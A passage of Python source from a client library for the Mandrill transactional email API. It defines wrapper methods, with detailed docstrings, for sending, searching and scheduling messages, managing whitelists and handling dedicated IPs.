all_time_series(self, ): """Return the recent history (hourly stats for the last 30 days) for all tags Returns: array. the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].unsubs (integer): the number of unsubscribes received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('tags/all-time-series', _params) class Messages(object): def __init__(self, master): self.master = master def send(self, message, async=False, ip_pool=None, send_at=None): """Send a new transactional message through Mandrill Args: message (struct): the information on the message to send:: message.html (string): the full HTML content to be sent message.text (string): optional full text content to be sent message.subject (string): the message subject message.from_email (string): the sender email address. message.from_name (string): optional from name to be used message.to (array): an array of recipient information.:: message.to[] (struct): a single recipient's information.:: message.to[].email (string): the email address of the recipient message.to[].name (string): the optional display name to use for the recipient message.to[].type (string): the header type to use for the recipient, defaults to "to" if not provided message.headers (struct): optional extra headers to add to the message (most headers are allowed) message.important (boolean): whether or not this message is important, and should be delivered ahead of non-important messages message.track_opens (boolean): whether or not to turn on open tracking for the message message.track_clicks (boolean): whether or not to turn on click tracking for the message message.auto_text (boolean): whether or not to automatically generate a text part for messages that are not given text message.auto_html (boolean): whether or not to automatically generate an HTML part for messages that are not given HTML message.inline_css (boolean): whether or not to automatically inline all CSS styles provided in the message HTML - only for HTML documents less than 256KB in size message.url_strip_qs (boolean): whether or not to strip the query string from URLs when aggregating tracked URL data message.preserve_recipients (boolean): whether or not to expose all recipients in to "To" header for each email message.view_content_link (boolean): set to false to remove content logging for sensitive emails message.bcc_address (string): an optional address to receive an exact copy of each recipient's email message.tracking_domain (string): a custom domain to use for tracking opens and clicks instead of mandrillapp.com message.signing_domain (string): a custom domain to use for SPF/DKIM signing instead of mandrill (for "via" or "on behalf of" in email clients) message.return_path_domain (string): a custom domain to use for the messages's return-path message.merge (boolean): whether to evaluate merge tags in the message. Will automatically be set to true if either merge_vars or global_merge_vars are provided. message.global_merge_vars (array): global merge variables to use for all recipients. You can override these per recipient.:: message.global_merge_vars[] (struct): a single global merge variable:: message.global_merge_vars[].name (string): the global merge variable's name. Merge variable names are case-insensitive and may not start with _ message.global_merge_vars[].content (string): the global merge variable's content message.merge_vars (array): per-recipient merge variables, which override global merge variables with the same name.:: message.merge_vars[] (struct): per-recipient merge variables:: message.merge_vars[].rcpt (string): the email address of the recipient that the merge variables should apply to message.merge_vars[].vars (array): the recipient's merge variables:: message.merge_vars[].vars[] (struct): a single merge variable:: message.merge_vars[].vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _ message.merge_vars[].vars[].content (string): the merge variable's content message.tags (array): an array of string to tag the message with. Stats are accumulated using tags, though we only store the first 100 we see, so this should not be unique or change frequently. Tags should be 50 characters or less. Any tags starting with an underscore are reserved for internal use and will cause errors.:: message.tags[] (string): a single tag - must not start with an underscore message.subaccount (string): the unique id of a subaccount for this message - must already exist or will fail with an error message.google_analytics_domains (array): an array of strings indicating for which any matching URLs will automatically have Google Analytics parameters appended to their query string automatically. message.google_analytics_campaign (array|string): optional string indicating the value to set for the utm_campaign tracking parameter. If this isn't provided the email's from address will be used instead. message.metadata (array): metadata an associative array of user metadata. Mandrill will store this metadata and make it available for retrieval. In addition, you can select up to 10 metadata fields to index and make searchable using the Mandrill search api. message.recipient_metadata (array): Per-recipient metadata that will override the global values specified in the metadata parameter.:: message.recipient_metadata[] (struct): metadata for a single recipient:: message.recipient_metadata[].rcpt (string): the email address of the recipient that the metadata is associated with message.recipient_metadata[].values (array): an associated array containing the recipient's unique metadata. If a key exists in both the per-recipient metadata and the global metadata, the per-recipient metadata will be used. message.attachments (array): an array of supported attachments to add to the message:: message.attachments[] (struct): a single supported attachment:: message.attachments[].type (string): the MIME type of the attachment message.attachments[].name (string): the file name of the attachment message.attachments[].content (string): the content of the attachment as a base64-encoded string message.images (array): an array of embedded images to add to the message:: message.images[] (struct): a single embedded image:: message.images[].type (string): the MIME type of the image - must start with "image/" message.images[].name (string): the Content ID of the image - use <img src="cid:THIS_VALUE"> to reference the image in your HTML content message.images[].content (string): the content of the image as a base64-encoded string async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/send will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async. ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead. send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. An additional fee applies for scheduled email, and this feature is only available to accounts with a positive balance. Returns: array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", or "rejected":: [] (struct): the sending results for a single recipient:: [].email (string): the email address of the recipient [].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid" [].reject_reason (string): the reason for the rejection if the recipient status is "rejected" []._id (string): the message's unique id Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key PaymentRequiredError: The requested feature requires payment. UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'message': message, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at} return self.master.call('messages/send', _params) def send_template(self, template_name, template_content, message, async=False, ip_pool=None, send_at=None): """Send a new transactional message through Mandrill using a template Args: template_name (string): the immutable name or slug of a template that exists in the user's account. For backwards-compatibility, the template name may also be used but the immutable slug is preferred. template_content (array): an array of template content to send. Each item in the array should be a struct with two keys - name: the name of the content block to set the content for, and content: the actual content to put into the block:: template_content[] (struct): the injection of a single piece of content into a single editable region:: template_content[].name (string): the name of the mc:edit editable region to inject into template_content[].content (string): the content to inject message (struct): the other information on the message to send - same as /messages/send, but without the html content:: message.html (string): optional full HTML content to be sent if not in template message.text (string): optional full text content to be sent message.subject (string): the message subject message.from_email (string): the sender email address. message.from_name (string): optional from name to be used message.to (array): an array of recipient information.:: message.to[] (struct): a single recipient's information.:: message.to[].email (string): the email address of the recipient message.to[].name (string): the optional display name to use for the recipient message.to[].type (string): the header type to use for the recipient, defaults to "to" if not provided message.headers (struct): optional extra headers to add to the message (most headers are allowed) message.important (boolean): whether or not this message is important, and should be delivered ahead of non-important messages message.track_opens (boolean): whether or not to turn on open tracking for the message message.track_clicks (boolean): whether or not to turn on click tracking for the message message.auto_text (boolean): whether or not to automatically generate a text part for messages that are not given text message.auto_html (boolean): whether or not to automatically generate an HTML part for messages that are not given HTML message.inline_css (boolean): whether or not to automatically inline all CSS styles provided in the message HTML - only for HTML documents less than 256KB in size message.url_strip_qs (boolean): whether or not to strip the query string from URLs when aggregating tracked URL data message.preserve_recipients (boolean): whether or not to expose all recipients in to "To" header for each email message.view_content_link (boolean): set to false to remove content logging for sensitive emails message.bcc_address (string): an optional address to receive an exact copy of each recipient's email message.tracking_domain (string): a custom domain to use for tracking opens and clicks instead of mandrillapp.com message.signing_domain (string): a custom domain to use for SPF/DKIM signing instead of mandrill (for "via" or "on behalf of" in email clients) message.return_path_domain (string): a custom domain to use for the messages's return-path message.merge (boolean): whether to evaluate merge tags in the message. Will automatically be set to true if either merge_vars or global_merge_vars are provided. message.global_merge_vars (array): global merge variables to use for all recipients. You can override these per recipient.:: message.global_merge_vars[] (struct): a single global merge variable:: message.global_merge_vars[].name (string): the global merge variable's name. Merge variable names are case-insensitive and may not start with _ message.global_merge_vars[].content (string): the global merge variable's content message.merge_vars (array): per-recipient merge variables, which override global merge variables with the same name.:: message.merge_vars[] (struct): per-recipient merge variables:: message.merge_vars[].rcpt (string): the email address of the recipient that the merge variables should apply to message.merge_vars[].vars (array): the recipient's merge variables:: message.merge_vars[].vars[] (struct): a single merge variable:: message.merge_vars[].vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _ message.merge_vars[].vars[].content (string): the merge variable's content message.tags (array): an array of string to tag the message with. Stats are accumulated using tags, though we only store the first 100 we see, so this should not be unique or change frequently. Tags should be 50 characters or less. Any tags starting with an underscore are reserved for internal use and will cause errors.:: message.tags[] (string): a single tag - must not start with an underscore message.subaccount (string): the unique id of a subaccount for this message - must already exist or will fail with an error message.google_analytics_domains (array): an array of strings indicating for which any matching URLs will automatically have Google Analytics parameters appended to their query string automatically. message.google_analytics_campaign (array|string): optional string indicating the value to set for the utm_campaign tracking parameter. If this isn't provided the email's from address will be used instead. message.metadata (array): metadata an associative array of user metadata. Mandrill will store this metadata and make it available for retrieval. In addition, you can select up to 10 metadata fields to index and make searchable using the Mandrill search api. message.recipient_metadata (array): Per-recipient metadata that will override the global values specified in the metadata parameter.:: message.recipient_metadata[] (struct): metadata for a single recipient:: message.recipient_metadata[].rcpt (string): the email address of the recipient that the metadata is associated with message.recipient_metadata[].values (array): an associated array containing the recipient's unique metadata. If a key exists in both the per-recipient metadata and the global metadata, the per-recipient metadata will be used. message.attachments (array): an array of supported attachments to add to the message:: message.attachments[] (struct): a single supported attachment:: message.attachments[].type (string): the MIME type of the attachment message.attachments[].name (string): the file name of the attachment message.attachments[].content (string): the content of the attachment as a base64-encoded string message.images (array): an array of embedded images to add to the message:: message.images[] (struct): a single embedded image:: message.images[].type (string): the MIME type of the image - must start with "image/" message.images[].name (string): the Content ID of the image - use <img src="cid:THIS_VALUE"> to reference the image in your HTML content message.images[].content (string): the content of the image as a base64-encoded string async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/send will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async. ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead. send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. An additional fee applies for scheduled email, and this feature is only available to accounts with a positive balance. Returns: array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", "scheduled", or "rejected":: [] (struct): the sending results for a single recipient:: [].email (string): the email address of the recipient [].status (string): the sending status of the recipient - either "sent", "queued", "rejected", or "invalid" [].reject_reason (string): the reason for the rejection if the recipient status is "rejected" []._id (string): the message's unique id Raises: UnknownTemplateError: The requested template does not exist PaymentRequiredError: The requested feature requires payment. InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'template_name': template_name, 'template_content': template_content, 'message': message, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at} return self.master.call('messages/send-template', _params) def search(self, query='*', date_from=None, date_to=None, tags=None, senders=None, api_keys=None, limit=100): """Search the content of recently sent messages and optionally narrow by date range, tags and senders Args: query (string): the search terms to find matching messages for date_from (string): start date date_to (string): end date tags (array): an array of tag names to narrow the search to, will return messages that contain ANY of the tags senders (array): an array of sender addresses to narrow the search to, will return messages sent by ANY of the senders api_keys (array): an array of API keys to narrow the search to, will return messages sent by ANY of the keys limit (integer): the maximum number of results to return, defaults to 100, 1000 is the maximum Returns: array. of structs for each matching message:: [] (struct): the information for a single matching message:: [].ts (integer): the Unix timestamp from when this message was sent []._id (string): the message's unique id [].sender (string): the email address of the sender [].template (string): the unique name of the template used, if any [].subject (string): the message's subject line [].email (string): the recipient email address [].tags (array): list of tags on this message:: [].tags[] (string): individual tag on this message [].opens (integer): how many times has this message been opened [].opens_detail (array): list of individual opens for the message:: [].opens_detail[] (struct): information on an individual open:: [].opens_detail[].ts (integer): the unix timestamp from when the message was opened [].opens_detail[].ip (string): the IP address that generated the open [].opens_detail[].location (string): the approximate region and country that the opening IP is located [].opens_detail[].ua (string): the email client or browser data of the open [].clicks (integer): how many times has a link been clicked in this message [].clicks_detail (array): list of individual clicks for the message:: [].clicks_detail[] (struct): information on an individual click:: [].clicks_detail[].ts (integer): the unix timestamp from when the message was clicked [].clicks_detail[].url (string): the URL that was clicked on [].clicks_detail[].ip (string): the IP address that generated the click [].clicks_detail[].location (string): the approximate region and country that the clicking IP is located [].clicks_detail[].ua (string): the email client or browser data of the click [].state (string): sending status of this message: sent, bounced, rejected [].metadata (struct): any custom metadata provided when the message was sent smtp_events (array): a log of up to 3 smtp events for the message:: smtp_events[] (struct): information about a specific smtp event:: smtp_events[].ts (integer): the Unix timestamp when the event occured smtp_events[].type (string): the message's state as a result of this event smtp_events[].diag (string): the SMTP response from the recipient's server Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key ServiceUnavailableError: The subsystem providing this API call is down for maintenance Error: A general Mandrill error has occurred """ _params = {'query': query, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders, 'api_keys': api_keys, 'limit': limit} return self.master.call('messages/search', _params) def search_time_series(self, query='*', date_from=None, date_to=None, tags=None, senders=None): """Search the content of recently sent messages and return the aggregated hourly stats for matching messages Args: query (string): the search terms to find matching messages for date_from (string): start date date_to (string): end date tags (array): an array of tag names to narrow the search to, will return messages that contain ANY of the tags senders (array): an array of sender addresses to narrow the search to, will return messages sent by ANY of the senders Returns: array. the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].unsubs (integer): the number of unsubscribes received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key ServiceUnavailableError: The subsystem providing this API call is down for maintenance Error: A general Mandrill error has occurred """ _params = {'query': query, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders} return self.master.call('messages/search-time-series', _params) def info(self, id): """Get the information for a single recently sent message Args: id (string): the unique id of the message to get - passed as the "_id" field in webhooks, send calls, or search calls Returns: struct. the information for the message:: ts (integer): the Unix timestamp from when this message was sent _id (string): the message's unique id sender (string): the email address of the sender template (string): the unique name of the template used, if any subject (string): the message's subject line email (string): the recipient email address tags (array): list of tags on this message:: tags[] (string): individual tag on this message opens (integer): how many times has this message been opened opens_detail (array): list of individual opens for the message:: opens_detail[] (struct): information on an individual open:: opens_detail[].ts (integer): the unix timestamp from when the message was opened opens_detail[].ip (string): the IP address that generated the open opens_detail[].location (string): the approximate region and country that the opening IP is located opens_detail[].ua (string): the email client or browser data of the open clicks (integer): how many times has a link been clicked in this message clicks_detail (array): list of individual clicks for the message:: clicks_detail[] (struct): information on an individual click:: clicks_detail[].ts (integer): the unix timestamp from when the message was clicked clicks_detail[].url (string): the URL that was clicked on clicks_detail[].ip (string): the IP address that generated the click clicks_detail[].location (string): the approximate region and country that the clicking IP is located clicks_detail[].ua (string): the email client or browser data of the click state (string): sending status of this message: sent, bounced, rejected metadata (struct): any custom metadata provided when the message was sent smtp_events (array): a log of up to 3 smtp events for the message:: smtp_events[] (struct): information about a specific smtp event:: smtp_events[].ts (integer): the Unix timestamp when the event occured smtp_events[].type (string): the message's state as a result of this event smtp_events[].diag (string): the SMTP response from the recipient's server Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMessageError: The provided message id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('messages/info', _params) def content(self, id): """Get the full content of a recently sent message Args: id (string): the unique id of the message to get - passed as the "_id" field in webhooks, send calls, or search calls Returns: struct. the content of the message:: ts (integer): the Unix timestamp from when this message was sent _id (string): the message's unique id from_email (string): the email address of the sender from_name (string): the alias of the sender (if any) subject (string): the message's subject line to (struct): the message recipient's information:: to.email (string): the email address of the recipient to.name (string): the alias of the recipient (if any) tags (array): list of tags on this message:: tags[] (string): individual tag on this message headers (struct): the key-value pairs of the custom MIME headers for the message's main document text (string): the text part of the message, if any html (string): the HTML part of the message, if any attachments (array): an array of any attachments that can be found in the message:: attachments[] (struct): information about an individual attachment:: attachments[].name (string): the file name of the attachment attachments[].type (string): the MIME type of the attachment attachments[].content (string): the content of the attachment as a base64 encoded string Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMessageError: The provided message id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('messages/content', _params) def parse(self, raw_message): """Parse the full MIME document for an email message, returning the content of the message broken into its constituent pieces Args: raw_message (string): the full MIME document of an email message Returns: struct. the parsed message:: subject (string): the subject of the message from_email (string): the email address of the sender from_name (string): the alias of the sender (if any) to (array): an array of any recipients in the message:: to[] (struct): the information on a single recipient:: to[].email (string): the email address of the recipient to[].name (string): the alias of the recipient (if any) headers (struct): the key-value pairs of the MIME headers for the message's main document text (string): the text part of the message, if any html (string): the HTML part of the message, if any attachments (array): an array of any attachments that can be found in the message:: attachments[] (struct): information about an individual attachment:: attachments[].name (string): the file name of the attachment attachments[].type (string): the MIME type of the attachment attachments[].binary (boolean): if this is set to true, the attachment is not pure-text, and the content will be base64 encoded attachments[].content (string): the content of the attachment as a text string or a base64 encoded string based on the attachment type images (array): an array of any embedded images that can be found in the message:: images[] (struct): information about an individual image:: images[].name (string): the Content-ID of the embedded image images[].type (string): the MIME type of the image images[].content (string): the content of the image as a base64 encoded string Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'raw_message': raw_message} return self.master.call('messages/parse', _params) def send_raw(self, raw_message, from_email=None, from_name=None, to=None, async=False, ip_pool=None, send_at=None, return_path_domain=None): """Take a raw MIME document for a message, and send it exactly as if it were sent through Mandrill's SMTP servers Args: raw_message (string): the full MIME document of an email message from_email (string|null): optionally define the sender address - otherwise we'll use the address found in the provided headers from_name (string|null): optionally define the sender alias to (array|null): optionally define the recipients to receive the message - otherwise we'll use the To, Cc, and Bcc headers provided in the document:: to[] (string): the email address of the recipient async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/sendRaw will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async. ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead. send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. return_path_domain (string): a custom domain to use for the messages's return-path Returns: array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", or "rejected":: [] (struct): the sending results for a single recipient:: [].email (string): the email address of the recipient [].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid" [].reject_reason (string): the reason for the rejection if the recipient status is "rejected" []._id (string): the message's unique id Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key PaymentRequiredError: The requested feature requires payment. UnknownTemplateError: The requested template does not exist UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'raw_message': raw_message, 'from_email': from_email, 'from_name': from_name, 'to': to, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at, 'return_path_domain': return_path_domain} return self.master.call('messages/send-raw', _params) def list_scheduled(self, to=None): """Queries your scheduled emails by sender or recipient, or both. Args: to (string): an optional recipient address to restrict results to Returns: array. a list of up to 1000 scheduled emails:: [] (struct): a scheduled email:: []._id (string): the scheduled message id [].created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format [].send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format [].from_email (string): the email's sender address [].to (string): the email's recipient [].subject (string): the email's subject Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'to': to} return self.master.call('messages/list-scheduled', _params) def cancel_scheduled(self, id): """Cancels a scheduled email. Args: id (string): a scheduled email id, as returned by any of the messages/send calls or messages/list-scheduled Returns: struct. information about the scheduled email that was cancelled.:: _id (string): the scheduled message id created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format from_email (string): the email's sender address to (string): the email's recipient subject (string): the email's subject Raises: UnknownMessageError: The provided message id does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('messages/cancel-scheduled', _params) def reschedule(self, id, send_at): """Reschedules a scheduled email. Args: id (string): a scheduled email id, as returned by any of the messages/send calls or messages/list-scheduled send_at (string): the new UTC timestamp when the message should sent. Mandrill can't time travel, so if you specify a time in past the message will be sent immediately Returns: struct. information about the scheduled email that was rescheduled.:: _id (string): the scheduled message id created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format from_email (string): the email's sender address to (string): the email's recipient subject (string): the email's subject Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMessageError: The provided message id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id, 'send_at': send_at} return self.master.call('messages/reschedule', _params) class Whitelists(object): def __init__(self, master): self.master = master def add(self, email): """Adds an email to your email rejection whitelist. If the address is currently on your blacklist, that blacklist entry will be removed automatically. Args: email (string): an email address to add to the whitelist Returns: struct. a status object containing the address and the result of the operation:: email (string): the email address you provided whether (boolean): the operation succeeded Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'email': email} return self.master.call('whitelists/add', _params) def list(self, email=None): """Retrieves your email rejection whitelist. You can provide an email address or search prefix to limit the results. Returns up to 1000 results. Args: email (string): an optional email address or prefix to search by Returns: array. up to 1000 whitelist entries:: [] (struct): the information for each whitelist entry:: [].email (string): the email that is whitelisted [].detail (string): a description of why the email was whitelisted [].created_at (string): when the email was added to the whitelist Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'email': email} return self.master.call('whitelists/list', _params) def delete(self, email): """Removes an email address from the whitelist. Args: email (string): the email address to remove from the whitelist Returns: struct. a status object containing the address and whether the deletion succeeded:: email (string): the email address that was removed from the blacklist deleted (boolean): whether the address was deleted successfully Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'email': email} return self.master.call('whitelists/delete', _params) class Ips(object): def __init__(self, master): self.master = master def list(self, ): """Lists your dedicated IPs. Returns: array. an array of structs for each dedicated IP:: [] (struct): information about a single dedicated IP:: [].ip (string): the ip address [].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].pool (string): the name of the pool that this dedicated IP belongs to [].domain (string): the domain name (reverse dns) of this dedicated IP [].custom_dns (struct): information about the ip's custom dns, if it has been configured:: [].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip [].custom_dns.valid (boolean): whether the ip's custom dns is currently valid [].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error [].warmup (struct): information about the ip's warmup status:: [].warmup.warming_up (boolean): whether the ip is currently in warmup mode [].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format [].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('ips/list', _params) def info(self, ip): """Retrieves information about a single dedicated ip. Args: ip (string): a dedicated IP address Returns: struct. Information about the dedicated ip:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'ip': ip} return self.master.call('ips/info', _params) def provision(self, warmup=False, pool=None): """Requests an additional dedicated IP for your account. Accounts may have one outstanding request at any time, and provisioning requests are processed within 24 hours. Args: warmup (boolean): whether to enable warmup mode for the ip pool (string): the id of the pool to add the dedicated ip to, or null to use your account's default pool Returns: struct. a description of the provisioning request that was created:: requested_at (string): the date and time that the request was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format Raises: IPProvisionLimitError: A dedicated IP cannot be provisioned while another request is pending. UnknownPoolError: The provided dedicated IP pool does not exist. PaymentRequiredError: The requested feature requires payment. InvalidKeyError: The provided API key is not a valid Mandrill API key NoSendingHistoryError: The user hasn't started sending yet. PoorReputationError: The user's reputation is too low to continue. Error: A general Mandrill error has occurred """ _params = {'warmup': warmup, 'pool': pool} return self.master.call('ips/provision', _params) def start_warmup(self, ip): """Begins the warmup process for a dedicated IP. During the warmup process, Mandrill will gradually increase the percentage of your mail that is sent over the warming-up IP, over a period of roughly 30 days. The rest of your mail will be sent over shared IPs or other dedicated IPs in the same pool. Args: ip (string): a dedicated ip address Returns: struct. Information about the dedicated IP:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownIPError: The provided dedicated IP does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'ip': ip} return self.master.call('ips/start-warmup', _params) def cancel_warmup(self, ip): """Cancels the warmup process for a dedicated IP. Args: ip (string): a dedicated ip address Returns: struct. Information about the dedicated IP:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownIPError: The provided dedicated IP does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'ip': ip} return self.master.call('ips/cancel-warmup', _params) def set_pool(self, ip, pool, create_pool=False): """Moves a dedicated IP to a different pool. Args: ip (string): a dedicated ip address pool (string): the name of the new pool to add the dedicated ip to create_pool (boolean): whether to create the pool if it does not exist; if false and the pool does not exist, an Unknown_Pool will be thrown. Returns: struct. Information about the updated state of the dedicated IP:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownIPError: The provided dedicated IP does not exist. UnknownPoolError: The provided dedicated IP pool does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key InvalidEmptyDefaultPoolError: You cannot remove the last IP from your default IP pool. Error: A general Mandrill error has occurred """ _params = {'ip': ip, 'pool': pool, 'create_pool': create_pool} return self.master.call('ips/set-pool', _params) def delete(self, ip): """Deletes a dedicated IP. This is permanent and cannot be undone. Args: ip (string): the dedicated ip to remove from your account Returns: struct. a description of the ip that was removed from your account.:: ip (string): the ip address deleted (string): a boolean indicating whether the ip was successfully deleted Raises: 